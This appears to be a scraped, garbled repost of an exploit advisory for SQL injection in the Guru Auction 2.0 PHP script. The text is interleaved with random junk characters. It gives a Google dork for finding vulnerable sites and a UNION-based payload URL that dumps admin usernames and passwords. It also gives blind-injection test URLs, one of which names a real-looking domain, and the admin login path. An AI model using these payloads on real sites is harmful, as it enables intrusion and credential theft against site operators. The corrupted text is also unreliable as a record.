Guru Auction 2.0 Multiple SQL Injection Vulnerabilities( o8 o: J3 L% B9 s. w
( N2 k- R: A/ Z. s作者 : v3n0m. Z" u' t. R6 }: N
应用 : Guru Auction 2.0
1 g* v8 S7 ]# g+ b' L \Price : $49
$ `( M2 p8 v) G3 YVendor : http://www.guruscript.com/
% D. B G; S6 R! }Google Dork : inurl:subcat.php?cate_id=
( b9 J6 G: ]% D2 Q
6 W8 p6 K& F+ K! jSQLi p0c:7 s! Q! ^7 R1 C- z
~~~~~~~~~~
n$ p7 a# `3 Z9 rhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--$ ~9 T& x- A1 P9 [, [# H
1 N' f& T7 I0 L; }# V2 U
# @8 k3 B, K. {$ Q) M
盲注 p0c:; i* U( y' Y$ q. f5 U
~~~~~~~~~~
/ ?3 V- o3 [2 T6 o o) z+ |) U0 thttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
9 F* o3 l0 T1 U/ l! lhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false$ [+ X& g; L2 W, D ?% F
# S# |2 C" r' j. n7 t! |4 z4 g/ [
管理登录入口:0 A/ ?0 u) y$ A" U
~~~~~~~~~~
- R. b" m6 M1 R- S0 Hhttp://domain.tld/[path]/admin/
a/ Q: V- g/ X/ h |